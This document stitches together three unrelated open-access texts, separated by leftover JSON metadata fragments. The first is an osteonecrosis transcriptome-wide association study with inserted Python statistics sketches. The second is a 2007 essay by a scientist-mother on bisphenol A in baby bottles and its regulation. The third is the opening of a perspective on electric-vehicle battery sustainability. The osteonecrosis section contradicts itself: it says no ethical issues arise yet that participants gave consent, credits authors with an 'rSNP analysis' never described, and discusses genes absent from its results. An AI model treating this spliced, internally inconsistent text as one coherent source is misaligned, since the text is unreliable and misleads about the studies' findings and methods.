Osteonecrosis is a complex multifactorial disease affected by both genetic and environmental factors (Baek et al., 2017). Risk factors for developing ON include serious trauma, corticosteroid medications, immunosuppressive therapy, autoimmune diseases, and chronic alcohol intake (Mont et al., 2000; Gladman et al., 2001). During the past decades, a number of genetic studies of ON have been conducted, linking specific genes or susceptibility loci to the pathogenesis of ON (Hadjigeorgiou et al., 2008; Karol et al., 2015; Sun et al., 2015; Zhou et al., 2015). For example, a meta-analysis reported that polymorphisms in vascular endothelial growth factor, endothelial nitric oxide synthase, and the ATP-binding cassette subfamily B member 1 transporter (ABCB1) were associated with the risk of ONFH. Another study observed that glucocorticoid-associated ON was associated with a genetic locus near a glutamate receptor gene (Karol et al., 2015). The R192Q and rs662 polymorphisms in paraoxonase-1 were also reported to increase susceptibility to ONFH (Hadjigeorgiou et al., 2007; Li et al., 2017). Hypofibrinolysis conferred by the 4G/4G plasminogen activator inhibitor-1 gene variant is a major predisposing factor for avascular ON in renal transplant patients (Ferrari et al., 2002). Genetic polymorphisms in the ABCB1 gene (C3435T), the apolipoprotein B (ApoB) gene (C7623T), and the cAMP-response element binding protein-binding protein (CBP) gene (rs3751845) increased the risk of steroid-induced ONFH and were helpful for predicting it (Kuribayashi et al., 2008). However, previous studies mostly focused on single or several gene defects associated with ONFH, and few large-scale genetic studies of ONFH have been conducted. The genetic mechanism of ON remains elusive.
Genome-wide association studies (GWAS) are a powerful approach for identifying the susceptibility genes of complex diseases or traits. However, a great number of genetic variants affect complex traits by regulating gene expression and thereby changing the abundance of one or multiple proteins (Lappalainen et al., 2013). For instance, non-coding regulatory loci, such as expression quantitative trait loci and methylation quantitative trait loci (Grubert et al., 2015), can affect disease risk by regulating the expression levels of disease-related genes. The genetic loci identified by GWAS are mostly located in non-coding regulatory regions of the genome. Causal genetic variants within non-coding regulatory regions are commonly indistinguishable from neighboring markers and are likely to be missed in conventional GWAS (Zhang and Lupski, 2015). In recent years, the transcriptome-wide association study (TWAS) has been proposed, which is capable of identifying disease-associated genes at the mRNA expression level (Gusev et al., 2016a). TWAS has been applied to the genetic studies of multiple complex human diseases and shows good performance for disease gene mapping (Gusev et al., 2016b; Thériault et al., 2017). For instance, Gusev et al. (2016b) performed a TWAS of schizophrenia by integrating a GWAS dataset of schizophrenia with mRNA expression references from brain, blood, and adipose tissues; they identified 157 schizophrenia-associated genes, of which 35 were novel. Wu et al. (2018) performed a TWAS to evaluate the associations between genetically predicted gene expression levels and breast cancer risk and identified 48 candidate genes for breast cancer.
In this study, using the latest GWAS dataset of ON obtained from the UK Biobank, we first conducted a TWAS to scan candidate genes for ON. The ON-associated genes identified by TWAS were further subjected to gene ontology (GO) enrichment analysis with the DAVID tool. To validate the TWAS results of ON, we also compared the TWAS results with the mRNA expression profiles of ONFH to identify common genes and GO terms shared by TWAS and mRNA expression profiling.
GWAS Summary Dataset of ON
The GWAS summary dataset of ON was derived from the UK Biobank database (Bycroft et al., 2018; Canela-Xandri et al., 2018). Briefly, the UK Biobank genetic dataset contains genome-wide genotype data for 452,264 participants, including 603 osteonecrosis patients, as defined by the International Classification of Diseases, Tenth Revision (ICD-10) code "M87." DNA was extracted from frozen-stored blood samples and genotyped using the marker content of the UK Biobank Axiom array. The samples were imputed with a new version of the imputation program referred to as IMPUTE4. Principal component analysis was applied to account for population structure in both sample- and marker-based quality control. The GWAS summary data contain 623,944 genotyped variants that passed quality control, 9,113,133 imputed variants that passed quality control, all 30,798,054 imputed variants available for download, and 9,113,133 imputed variants that passed quality control with a P value different from 0 [for detailed information on the subjects, genotyping, imputation, and quality control, refer to the published studies (Bycroft et al., 2018; Canela-Xandri et al., 2018)].
Gene Expression Profile of BMSCs
The mRNA expression profiling data of bone marrow mesenchymal stem cells (BMSCs) from ONFH patients were used here (Wang et al., 2018). Briefly, three patients with steroid-induced ONFH and three control subjects were enrolled from the Department of Orthopedics. ONFH was diagnosed based on preoperative radiographs and magnetic resonance images.
Arraystar Human lncRNA microarray V3 (GPL16956), covering 26,109 mRNAs, was used for microarray analysis. An unpaired Student's t-test was performed to evaluate the differences between the two groups. The false discovery rate was controlled with the Benjamini-Hochberg algorithm in the R 3.4.1 suite to correct the P values. Differentially expressed mRNAs were identified at |fold change (FC)| > 2.0 and Benjamini-Hochberg-corrected P values < 0.05 (a sketch of this filter follows below). A total of 838 up-regulated mRNAs and 1,937 down-regulated mRNAs were identified in the ONFH group [for a detailed description of the samples, experimental design, statistical analysis, and quality control, refer to the previous study (Wang et al., 2018)].
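To make the filtering step concrete, here is a minimal, self-contained sketch of Benjamini-Hochberg correction combined with the |FC| > 2 cutoff. The p-values and fold changes below are made-up illustrative numbers, not data from the study, which performed this step in R.

```python
import numpy as np

def benjamini_hochberg(pvals):
    """Return BH-adjusted p-values (q-values) in the original order."""
    p = np.asarray(pvals, dtype=float)
    n = p.size
    order = np.argsort(p)
    ranked = p[order] * n / np.arange(1, n + 1)   # p * n / rank
    # enforce monotonicity from the largest rank downward
    q = np.minimum.accumulate(ranked[::-1])[::-1]
    out = np.empty(n)
    out[order] = np.clip(q, 0, 1)
    return out

pvals = [0.001, 0.008, 0.039, 0.041, 0.20]       # toy raw p-values
fold_changes = [7.03, 2.22, -2.92, 1.4, 3.1]     # toy signed fold changes
q = benjamini_hochberg(pvals)
hits = [i for i in range(len(pvals))
        if q[i] < 0.05 and abs(fold_changes[i]) > 2.0]
print(hits)  # indices 0 and 1 survive both the FDR and |FC| > 2 cutoffs
```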
TWAS of ON
TWAS of ON was performed using the FUSION software by integrating the UK Biobank ON GWAS summary data with pre-computed gene expression reference weights of peripheral blood, whole blood, and muscle skeleton (Gusev and Ko, 2016). Briefly, the gene expression weights of a given tissue were first calculated using the prediction models implemented in FUSION. For a given gene, a Bayesian sparse linear mixed model (Zhou et al., 2013b) was first used to compute SNP expression weights in the 1-Mb cis locus. Let w denote the weights, Z the ON GWAS Z scores, and L the SNP correlation (LD) matrix; the association between predicted expression and ON was then estimated as Z_TWAS = w'Z / (w'Lw)^(1/2) (Gusev and Ko, 2016). Finally, gene-disease associations were obtained by performing expression imputation chromosome by chromosome. In this study, the gene expression reference weight panels of peripheral blood (n = 1,247), whole blood (n = 1,264), and muscle skeleton (n = 361) were downloaded from the FUSION website. A P value was calculated by FUSION for each gene.
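For intuition, the statistic above can be reproduced numerically in a few lines. The sketch below uses toy weights, Z scores, and an LD matrix for three hypothetical cis-SNPs; actual analyses use the FUSION software with its reference panels.

```python
import numpy as np

def twas_z(w, z, L):
    """Z_TWAS = w'Z / sqrt(w'Lw): association between predicted expression
    and the trait, given SNP expression weights w, GWAS z-scores z, and LD L."""
    w, z = np.asarray(w, float), np.asarray(z, float)
    L = np.asarray(L, float)
    return float(w @ z / np.sqrt(w @ L @ w))

w = [0.4, -0.2, 0.1]                  # toy expression weights for 3 cis-SNPs
z = [2.5, -1.8, 0.6]                  # toy GWAS z-scores for ON
L = [[1.0, 0.3, 0.1],                 # toy pairwise LD among the SNPs
     [0.3, 1.0, 0.2],
     [0.1, 0.2, 1.0]]
print(f"Z_TWAS = {twas_z(w, z, L):.2f}")  # ~3.53 for these toy inputs
```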
Gene Ontology Enrichment Analysis
The ON-associated genes identified by TWAS were further analyzed with the Database for Annotation, Visualization, and Integrated Discovery (DAVID) for GO enrichment (Huang da et al., 2009). The differentially expressed mRNAs of ONFH were also subjected to GO enrichment analysis. Finally, the GO enrichment results of TWAS and the mRNA expression profile were compared to identify common GO terms for ONFH.
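A natural companion to this overlap comparison is a hypergeometric test of whether two gene lists share more members than expected by chance. The sketch below plugs in numbers loosely mirroring this study (564 TWAS genes, 2,775 differentially expressed mRNAs, 59 shared); the ~20,000-gene background is an assumption, the paper does not report such a test, and the resulting P value depends strongly on the background chosen.

```python
from math import comb

def hypergeom_sf(k, N, K, n):
    """P(X >= k): probability of an overlap of at least k genes between
    lists of sizes K and n drawn from a background of N genes."""
    return sum(comb(K, x) * comb(N - K, n - x)
               for x in range(k, min(K, n) + 1)) / comb(N, n)

p = hypergeom_sf(k=59, N=20000, K=564, n=2775)
print(f"P(overlap >= 59) = {p:.3g}")
# Under independence the expected overlap is 564 * 2775 / 20000 ~= 78 genes,
# so with this particular background the observed overlap is not enriched;
# a smaller, array-specific background would change the conclusion.
```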
Ethics
Our research data were downloaded from an online public database and do not involve ethical issues.
TWAS Results of ON
Transcriptome-wide association study of ON identified 154 genes with P_TWAS < 0.05 in MS, such as STPG1 (P_TWAS = 0.0015), CTSS (P_TWAS = 0.0022), and THEM4 (P_TWAS = 0.01). All 154 significant genes are presented in Supplementary Table 1. We also identified 128 genes with P_TWAS < 0.05 in peripheral blood (Supplementary Table 2) and 279 genes with P_TWAS < 0.05 in whole blood (Supplementary Table 3), such as GLT25D2 (P_TWAS = 0.0078), VAMP4 (P_TWAS = 0.0080), USP24 (P_TWAS = 0.0022), and LAPTM5 (P_TWAS = 0.0027). The top 10 significant genes identified by TWAS for ON are shown in Table 1.
GO Enrichment Analysis Results
Gene ontology enrichment analysis of the genes identified by TWAS detected 53 GO terms with P < 0.05 for ON, such as mitochondrial matrix (P = 0.0027), RNA catabolic process (P = 2.91 × 10^-4), and membrane (P = 0.0096). Further comparing the GO enrichment results of TWAS and mRNA expression profiling detected four common GO terms: cysteine-type endopeptidase activity (P_TWAS = 0.0006, P_mRNA = 0.0227), extracellular space (P_TWAS = 0.0342, P_mRNA = 0.0012), protein binding (P_TWAS = 0.0112, P_mRNA = 0.0106), and ATP binding (P_TWAS = 0.0464, P_mRNA = 0.0033).
DISCUSSION
Limited effort has been devoted to exploring the genetic mechanism of ONFH to date, and the genes implicated in the development of ON remain largely unknown. In this study, we conducted a genome-wide integrative analysis of TWAS and mRNA expression profiling and identified multiple ONFH-associated genes, such as STEAP4, RABEP1, and MORC3. STEAP4 encodes a protein that belongs to the six-transmembrane epithelial antigen of prostate (STEAP) family and resides in the Golgi apparatus. Previous studies demonstrated that STEAP4 is involved in inflammatory responses and glucose metabolism (Wellen et al., 2007; ten Freyhaus et al., 2012; Kim et al., 2015). In addition, one study identified STEAP4 as a critical regulator of mitochondrial dysfunction linking inflammation and colon cancer (Xue et al., 2017). No study has yet reported on STEAP4 in ON. However, one study indicated that STEAP4 plays a critical role in cellular iron uptake and utilization in osteoclasts and is indispensable for osteoclast development and function (Zhou et al., 2013a). Impaired blood supply to the bone is associated with ON. Our result therefore suggests that STEAP4 may act as a regulator of iron uptake and utilization linking blood circulation and ON.
MORC3 encodes MORC family CW-type zinc finger protein 3, which localizes to the nuclear matrix. A previous study by Jadhav et al. (2016) showed that MORC3 mutant mice exhibit altered bone cell differentiation. Furthermore, MORC3 protein in MORC3(mut/+) osteoclasts and mice relocalized from the nuclear membrane to the cytoplasm, accompanied by increased osteoblast differentiation and altered gene expression (Jadhav et al., 2016). Another study demonstrated that MORC3 mutant mice exhibited reduced cortical thickness and area, together with changes to the hematopoietic stem cell niche and bone cell differentiation (Hong et al., 2017).
RABEP1 encodes Rab GTPase-binding effector protein 1, which belongs to the rabaptin protein family. Hypoxia has been implicated in the development of bone diseases, including ON (Liu et al., 2015; Yin et al., 2020). A recent study investigated the role of hypoxia and hypoxia-inducible factor 1α (HIF-1α) in fibrodysplasia ossificans progressiva (FOP) and found that HIF-1α could increase the duration and intensity of BMP signaling through RABEP1-mediated retention of ACVR1 in hypoxic connective tissue progenitor cells from FOP patients (Wang et al., 2016). In addition, RABEP1 was identified as a novel candidate gene influencing spinal volumetric bone mineral density in rats (Alam et al., 2010).
Gene ontology enrichment analysis detected several GO terms, such as mitochondrial matrix, ATP binding, positive regulation of cell-matrix adhesion, and RNA catabolic process. The mitochondrial matrix is the structural basis of energy metabolism and oxidative stress (Cadenas, 2018), and one study indicated that steroid-associated mitochondrial injury and redox failure are important elements in the pathogenesis of ON (Tsuchiya et al., 2018). ATP binding is closely related to the mitochondrial matrix, and ABCB1 polymorphisms contribute to the risk of ONFH (Zhang et al., 2017). Positive regulation of cell-matrix adhesion has been implicated in the regulation of hypoxia (Zhang et al., 2018), which is one of the factors causing apoptosis of bone cells (Seamon et al., 2012). In addition, RNA catabolic process is another enriched GO term; previous studies have demonstrated that RNA stability provides a rapid level of regulation that can have major effects on global inflammation (Herman and Autieri, 2018; Nyati et al., 2020).
To the best of our knowledge, this is the first TWAS of ON, and it identified multiple candidate genes whose imputed mRNA expression levels were associated with ON. To enhance the reliability of our study, we further compared the TWAS results with the mRNA expression profiling of ONFH and identified multiple common genes and GO terms shared by the DNA-level TWAS and mRNA expression profiling for ON. Although TWAS is a powerful approach, two limitations should be noted. First, although TWAS is not confounded by reverse causality (disease → expression independent of SNP), it is statistically very difficult to distinguish pleiotropy (where a SNP or linked SNPs affect ON and expression independently) from truly causal susceptibility genes. Second, there is some heterogeneity between the GWAS data and the gene expression profile: the GWAS data originate from European ON participants defined by ICD codes, while the gene expression data originate from patients with steroid-induced ONFH of Chinese ancestry. Datasets from the same ancestry and samples are currently lacking. Therefore, our results should be applied with caution, and further studies are needed to confirm our findings.
In summary, we conducted a genome-wide integrative analysis of TWAS and mRNA expression profiling of ON. We identified multiple candidate genes and associated biological terms for ON. Our results provide novel clues for clarifying the pathogenesis of ON.
DATA AVAILABILITY STATEMENT
The original contributions presented in the study are included in the article/Supplementary Material; further inquiries can be directed to the corresponding author.
ETHICS STATEMENT
Ethical review and approval was not required for the study on human participants in accordance with the local legislation and institutional requirements. The patients/participants provided their written informed consent to participate in this study.
AUTHOR CONTRIBUTIONS
MM and PL carried out the rSNP analysis and drafted the manuscript. LL, SC, BC, CL, ST, WL, YW, XG, and CW participated in its design and helped to draft the manuscript. All authors read and approved the final manuscript.
FUNDING
This work was supported by the National Natural Science Foundation of China (82073495).
"year": 2021,
"sha1": "687b21e9d830fc12cb949b60e2a1f012565853ab",
"oa_license": "CCBY",
"oa_url": "https://www.frontiersin.org/articles/10.3389/fgene.2021.663080/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "687b21e9d830fc12cb949b60e2a1f012565853ab",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Babies, Bottles, and Bisphenol A: The Story of a Scientist-Mother
A scientist and mother who studies bisphenol A, a chemical found in plastic baby bottles and cups, wrestles with the disconnect between scientific evidence that the chemical poses a special risk to children and current laws and regulations.
Essay
My 11-month-old daughter loves her baby bottles and sippy cups (first-person narrative is from the viewpoint of Rebecca Roberts). But as I sit and watch her drink from them, I cringe, because I happen to be a scientist who studies a chemical found in those bottles and cups. I also know that some scientific research suggests that exposure to that compound, called bisphenol A (BPA), is detrimental to good health, something I can't help but think about as I watch my daughter use her sippy cup as a teething ring.
As a scientist, I depend on evidence, logic, and imagination to explain observations made in the laboratory. I then interpret and communicate my findings to the scientific community and the public. As a mother, I strive to raise a healthy and happy child. I make daily decisions about what my baby does and does not do, in order to limit her exposure to danger. In both of my roles, I depend on information: nonbiased, factual, evidence-based information. The mother in me relies on my training as a scientist to objectively look at scientific data in order to determine personal choices for my daughter. But, like all people, I am not qualified, nor do I have the time, to understand all scientific issues. I must rely on others, the brokers of information: other scientists, medical personnel, the government, regulatory agencies, corporations, nonprofit organizations, and the media, to name a few.
The purveyors of information are not necessarily as objective, however, in their interpretation and dissemination of scientific data as my scientific self would like them to be, influenced as they are by timing, money, convenience, politics, and countless other agendas. I can only hope that the "facts" I receive are objective.
Moreover, I hope that any regulations stemming from this science are established for the benefit of my family and society as a whole. But how is the information regarding the effect of BPA on human health being packaged and communicated to the general public? Let's begin by understanding what BPA is and how our modern society relies on it.
In 1952, chemists working with BPA discovered that it could help form a hard, clear plastic called polycarbonate. Polycarbonates make such products as compact discs, sunglasses, bicycle helmets, water and milk bottles, baby bottles, food storage containers, tableware, plastic windows, bullet-resistant laminate, cell phones, car parts, toys, and some medical devices such as incubators, dialysis machines, and blood oxygenators. BPA is also used to make certain resins that are commonly found in the linings of food cans to prevent corrosion, and it is present in some polyvinyl chloride (PVC) plastic products, in white dental fillings, dental sealants, and in some flame retardants. In keeping with its widespread applications, BPA ranks among the highest-volume chemicals manufactured worldwide, with an annual production in 2003 of about 13 billion kilograms [1,2]. Regulation requiring a significant reduction in BPA production and use could have a dramatic economic impact and would likely require some changes in personal lifestyle.
BPA has been shown to leach from water bottles and food cans into the packaged foodstuffs. It then enters the body through the digestive tract when those foods are consumed. The level of BPA released from plastic depends on the age and wear of the plastic and on exposure to heat. For example, one study showed that small levels of BPA leached from baby bottles subjected to simulated normal uses, including boiling, washing with a bottle brush, and dishwashing [3]. Plastic tableware (such as that used in some schools) was also found to release BPA into hot vegetable soup [2]. Older, worn bottles and bowls released BPA more readily than newer products [2,3]. BPA is also present in rivers and streams and in drinking water, presumably due to leaching from plastic items in landfills [4-6]. A survey by the Centers for Disease Control and Prevention found that approximately 95% of Americans have detectable levels of BPA in their bodies [7].
Naturally, the prevalence of human exposure leads to questions about safety and health. Although the plastic industry continues to assert that BPA is safe, the chemical's endocrine-disrupting properties raise concern about its potential to cause harm. BPA exposure affects the hormonal system, in particular the pathway involving estrogen; its effects have been studied in cells, tissues, and whole organisms. In adult male mice and rats, the effects of BPA exposure (abnormal sperm and reduced fertility) were reversed when exposure stopped [8]. Of the few human epidemiological studies, one revealed a relationship between BPA exposure and repeated miscarriage [9]. Additionally, BPA causes a human breast cancer cell line to proliferate, indicating that estrogen-sensitive tissues
and cells in the body may react similarly [10].
Many animal studies focus on the effect of BPA exposure during fetal development, when cells and tissues are especially susceptible to hormonal alterations. Not only does BPA disrupt proper functioning of the placenta during gestation, but it also causes many deleterious health effects in offspring exposed in utero [11], including enlarged prostates and malformed urethras [12,13] and a higher risk of prostate cancer in male offspring [14], and genital tract alterations [12,13] and earlier puberty in female offspring [13]. Exposure also affects brain development, causing behavioral differences between males and females to be lost in offspring exposed in utero [15]. A similar correlation in human development is plausible. Indeed, BPA has been found in the bloodstream, placenta, cord blood, and fetal blood of humans at levels within the range studied in many of the animal models [16].
Although BPA was not used in plastics manufacturing until the 1950s, its hormonal activity was reported in 1936 [17]. For decades, products containing BPA were shown not to release the compound, and thus these products were deemed safe. Indeed, the current Environmental Protection Agency (EPA) regulation regarding allowable levels of BPA exposure is based on these early findings. As recently as 1999, an official of the Food and Drug Administration (FDA) stated that no BPA was detected in liquid stored in baby bottles under typical use conditions [18].
That same year, however, scientific techniques progressed such that very small levels of BPA could finally be measured accurately. Levels as low as parts per billion (ppb) are now routinely detected in the laboratory. Unfortunately, the ability to detect such low levels in a laboratory environment is often not good enough, since tissues and cells can respond to levels of BPA that are 100 times lower [19]. The first such study showing a detrimental effect of BPA at very low doses was published in 1997, and since then, over 100 other studies have been published [19,20].
Let's step back a moment and consider the roles of United States regulatory agencies such as the FDA and the EPA in determining the so-called safe human exposure level for a chemical. Founded in 1906, the FDA focuses on ensuring the safety of food, drugs, and medical products. Much later, in 1970, the EPA was established to protect human health in general and safeguard the environment by consolidating the varied efforts of research, monitoring, standard-setting, and enforcement. Six years after the creation of the EPA, the Toxic Substances Control Act was passed by Congress. This Act gave the EPA the power to control chemicals that pose an unreasonable risk to human health or the environment; in other words, the EPA was charged with determining the safe human exposure level for chemicals. Since taking on this daunting task of monitoring the roughly 75,000 chemicals produced in or imported into the US, the EPA has taken action to reduce the risk of over 3,600 chemicals but has banned or limited the production or use of only five. Currently, the EPA lists the "safe level" for BPA as 50 micrograms (or 0.00005 grams) of BPA per kilogram of body weight per day [21]. Following this guideline, a person weighing 140 pounds (approximately 63 kg) could "safely" ingest 0.003 grams of BPA per day, or a little over a gram of BPA each year. This "safe" level is much higher than the low doses to which people are routinely exposed.
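The dosage arithmetic in this paragraph is easy to verify. The short sketch below redoes it, and also computes the roughly 50-fold margin between typical exposure and the reference dose mentioned later in the essay; the only inputs are figures stated in the text.

```python
# Verify the essay's arithmetic on the EPA "safe" level for BPA.
weight_kg = 140 * 0.4536            # 140 lb is about 63.5 kg
rfd_g_per_kg_day = 50e-6            # 50 micrograms = 0.00005 g per kg per day

daily_g = weight_kg * rfd_g_per_kg_day
print(f"'safe' intake: {daily_g:.4f} g/day")   # ~0.0032 g/day
print(f"yearly: {daily_g * 365:.2f} g/year")   # ~1.16 g, 'a little over a gram'

typical_g_per_kg_day = 1e-6         # typical human exposure stated in the text
print(f"margin below the limit: {rfd_g_per_kg_day / typical_g_per_kg_day:.0f}x")  # 50x
```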
At this point, you might be wondering why this is the first time you've ever heard of BPA. The information is out there, but it is a puzzle to get through. Early studies indicated that BPA did not leach, or leached in very small amounts, from plastic products, including baby bottles. These studies are often referred to by those in the chemical industry, such as the American Plastics Council, who have a vested interest in maintaining the use of BPA in plastics production, to verify the safety of the products [22]. However, since 1999 many studies have shown that BPA leaches from products at levels known to cause health effects in animals. Earlier studies on BPA exposure also tended to find few resulting adverse health effects, yet these studies often used doses higher than those now regarded as being in an environmentally relevant range, that is, the low doses that humans are exposed to regularly and that fit within the so-called "low-dose theory," which claims that lower doses can be more harmful than higher doses [23,24]. These were the main studies initially used by the EPA to determine the "safe" level of BPA exposure, and they are often referenced to attest to the safety of BPA [21,22].
Because of this ambiguity, findings can be obscured by those who inform the public, especially those with a vested interest in BPA production and usage. As a result, the media presents a confusing and unclear picture of the health risks of BPA exposure by giving equal weight to statements from independent scientists and those working for industry. The resulting influence of this ambiguity was recently revealed in the spring of 2006, when US state legislators in California, Maryland, and Minnesota attempted to pass legislation that would ban the use of BPA in products aimed at children. None of the bills passed.
The bills focused on children because they are far more susceptible to adverse effects from chemical exposures than adults, even at very low doses. The biological processes involved in their ongoing development are vulnerable to disruption by BPA, and their ability to metabolically detoxify such contaminants is not yet mature. Moreover, children are more likely to be exposed to BPA orally because of their need to put things in their mouths, a purpose for which some BPA-containing products, such as some baby bottles and teething rings, are specifically designed.
The California bill (AB319) was introduced in February 2005, making it the first such legislation to be introduced in any state. Sponsored by Assembly Member Wilma Chan (Democrat), AB319 called for any BPA-containing products, including toys or childcare articles, intended for use by a child 3 years old or younger to be prohibited in the state. (It also sought to ban other harmful chemicals such as phthalates.) Violators of the ban would face civil action, carried out by the Attorney General, and penalties of no less than US$10,000 for each day of violation [25]. The fact sheet accompanying the bill states, "AB319 recognizes that we must act now to prevent exposure by eliminating at the source the chemicals, such as Bisphenol-A and Phthalates that pollute our bodies. By making intelligent decisions about what chemicals we allow into the environment, we can prevent unnecessary exposures to dangerous substances. Furthermore, children are incredibly sensitive to chemical pollution…. Some chemicals are simply too toxic and dangerous to children, to allow exposures to continue." The bill was energetically opposed by stakeholders in the chemical, plastics, baby products, and grocery industries. Under the umbrella organization Coalition for Consumer Choice, the NoAB319 campaign successfully fought the bill both in the media and in the Assembly hearing. In a news release by NoAB319, Steve Hentges, executive director of the Polycarbonate Business Unit of the American Plastics Council, stated that the legislation was "founded on insubstantial claims and unproven hypotheses that lack scientific rigor." The contradictory information set forth by the proponents and opponents of the bill ultimately led to its death, by one vote, in the Appropriations Committee, even after an amendment removed the BPA provisions. San Francisco Democrat Leland Yee, according to a spokesman, "decided that the decisions to ban chemicals should be left to health experts, not politicians, especially after scientists gave conflicting testimony at an Assembly hearing last week" [26]. Fortunately, Chan intends to resubmit the bill, and Yee said he "would support a new bill if it authorized state health officials to evaluate the risks and make the decision" [26].
At a more local level, the first legislation to ban BPA from products aimed at children passed in the city of San Francisco. The "Stop Toxic Toys" bill was virtually identical to AB319 and was signed into law on June 16, 2006. However, in April 2007, the clause limiting BPA in child-aimed products was repealed pending action at the state level. As a result, no action on BPA-containing products will occur in the city until January 2008, and only then if the state has not taken appropriate actions to reduce its use at the state level. While the initial San Francisco legislation was an important step, such a piecemeal approach to controlling BPA exposure, especially in young children, is not perfect. Companies and businesses are bound to have difficulty conforming to a variety of regulations. Although BPA-free alternatives are often available, consumers in areas with legislation may find a lack of choices when it comes to plastic products on the store shelves.
Ideally the national regulatory agencies should step in to minimize these problems.
At the national level, the White House disputes the "low-dose theory" and has proposed funding cuts for EPA research on endocrine-disrupting chemicals such as BPA; however, the US Congress has maintained the funding level [27]. The EPA has revisited safe exposure levels of other chemicals. For example, in 2001, the EPA reduced the allowable level of arsenic in drinking water from 50 ppb to 10 ppb. It should do the same for BPA.
Currently, both the EPA and the European Food Safety Authority (EFSA) have set the "safe" level of exposure to BPA at 0.00005 grams per kilogram of body weight per day. Although exposure is difficult to estimate accurately, humans are typically exposed to about 0.000001 grams of BPA per kilogram of body weight per day, 50 times lower than the EPA- and EFSA-deemed "safe" limit. Unfortunately, this level of exposure is still significantly higher than the low doses that some studies have shown to cause adverse health effects. Moreover, the levels of BPA found by the Centers for Disease Control and Prevention to be present in the bodies of Americans appear to be too high to be explained by exposure to known sources of BPA [7]. Thus, there is a clear need for further health studies on BPA exposure and for regulatory agencies to continue to monitor the science behind the politics. An attentive assessment of the risk of human exposure to BPA may prompt the plastics industry and manufacturers of products containing BPA to reevaluate their use of BPA and opt for BPA-free alternatives.
In the meantime, what is the scientist-mother to do? The mother in me still waits anxiously for the regulatory agencies and the legislature to catch up with the research on BPA that the scientist in me appreciates. I have switched my brand of sippy cups to one that doesn't contain BPA (a quick internet search will yield many sites describing these and other BPA-free baby products). Nevertheless, while I feel proactive as I watch my daughter happily drink her water, I still cringe a little bit when she drops the sippy cup, toddles over to her toy bin, and starts to gnaw on her plastic turtle instead.
"year": 2007,
"sha1": "122fad54afa55e200f26bedf61f7aeba46b90716",
"oa_license": "CCBY",
"oa_url": "https://journals.plos.org/plosbiology/article/file?id=10.1371/journal.pbio.0050200&type=printable",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "122fad54afa55e200f26bedf61f7aeba46b90716",
"s2fieldsofstudy": [
"Biology",
"Chemistry",
"Environmental Science"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
Sustainable Electric Vehicle Batteries for a Sustainable World: Perspectives on Battery Cathodes, Environment, Supply Chain, Manufacturing, Life Cycle, and Policy
Li‐ion batteries (LIBs) can reduce carbon emissions by powering electric vehicles (EVs) and promoting renewable energy development with grid‐scale energy storage. However, LIB production and electricity generation still heavily rely on fossil fuels at present, resulting in major environmental concerns. Are LIBs as environmentally friendly and sustainable as expected at the current stage? In the past 5 years, a skyrocketing growth of the EV market has been witnessed. LIBs have garnered huge attention from academia, industry, government, non‐governmental organizations, investors, and the general public. Tremendous volumes of LIBs are already implemented in EVs today, with a continuing, exponential growth expected for the years to come. When LIBs reach their end‐of‐life in the next decades, what technologies can be in place to enable second‐life or recycling of batteries? Herein, life cycle assessment studies are examined to evaluate the environmental impact of LIBs, and EVs are compared with internal combustion engine vehicles regarding environmental sustainability. To provide a holistic view of the LIB development, this Perspective provides insights into materials development, manufacturing, recycling, legislation and policy, and beyond. Last but not least, the future development of LIBs and charging infrastructures in light of emerging technologies are envisioned.
the life cycle (Figure 1b). [4] However, electricity generation leads to large variations in total lifetime emissions (Figure 1b). [4] Specifically, the electricity generation source can greatly affect total emissions (Figure 1c). [4] As of 2019, renewable energy sources account for 65% of power generation in Canada and nuclear energy accounts for 17%, resulting in comparatively low CO2 emissions of 132 gCO2 kWh−1 (Figure 1c). In Indonesia, however, fossil fuels account for 83% of electrical generation. The emissions during electricity generation in Indonesia were 761 gCO2 kWh−1, nearly six times higher than those of Canada (Figure 1c). [4] Total emissions from electricity generation increase as countries or regions rely more on fossil fuels (Figure 1c). To summarize, EVs generate lower lifetime emissions than their ICEV counterparts do, in good agreement with the literature. [5] In addition, increasing the share of renewable energy sources in the electricity generation mix can further enhance the environmental benefits of vehicle electrification. LIBs, being one of the most critical components of EVs, play a significant role in determining the long-term sustainability of the EV industry.
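To see how grid intensity propagates into per-kilometer use-phase emissions, here is a small illustrative calculation. The Canadian and Indonesian grid intensities are the figures quoted above; the EV consumption of 0.18 kWh/km and the ~250 gCO2/km well-to-wheel figure for a mid-size ICEV are assumptions for illustration, not values from the cited report.

```python
# Use-phase EV emissions scale linearly with grid carbon intensity.
GRID_G_PER_KWH = {"Canada": 132, "Indonesia": 761}  # gCO2/kWh, from the text
EV_KWH_PER_KM = 0.18   # assumed mid-size EV consumption
ICEV_G_PER_KM = 250    # assumed ICEV well-to-wheel emissions

for region, intensity in GRID_G_PER_KWH.items():
    ev_g_per_km = intensity * EV_KWH_PER_KM
    print(f"{region}: EV ~{ev_g_per_km:.0f} gCO2/km vs ICEV ~{ICEV_G_PER_KM} gCO2/km")
# Canada: ~24 gCO2/km; Indonesia: ~137 gCO2/km. Both beat the assumed ICEV,
# but the advantage shrinks roughly sixfold on a fossil-heavy grid.
```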
The development of LIBs needs to be driven in a more sustainable direction to satisfy the rising energy demand and simultaneously meet the criteria for net-zero carbon emissions. In this regard, it is crucial to assess the environmental impact and energy consumption of LIBs throughout the life cycle. Cathodes are a critical component of batteries and contribute considerably to the production cost of LIBs. [6] At present, cathodes still rely substantially on scarce metals, such as Ni and Co. These metals are less favorable in the cathode market due to their limited reserves and high price. Advancement of LIBs at the cathode materials level is required to balance sustainability, cost, and performance. More practical factors in industrial manufacturing need to be considered upon the commercialization of research-level materials and designs. Reliable LIB manufacturing requires the support of a robust supply chain. Evaluating the global LIB supply chain and manufacturing is critical to comprehend LIB development. In addition, massive numbers of LIBs will reach their end-of-life in the foreseeable future, given the substantial and increasing number of EVs around the world. Processing, repurposing, and recycling of these used batteries will be a pressing topic. Developing recycling technologies that are both economically and environmentally favorable can largely enhance the sustainability of LIBs. Recycling can in turn reduce the energy consumption and emissions of virgin battery production. Furthermore, government policies and legislation can have a significant impact on the supply chain, manufacturing, and recycling of LIBs. Here, we systematically evaluate the environmental impact of LIBs, cathode chemistry, battery manufacturing and supply chain, battery recycling, and government policies regarding their roles in the sustainable development of LIBs. Last but not least, we conceive a visionary scheme for future LIB development and charging infrastructure construction.

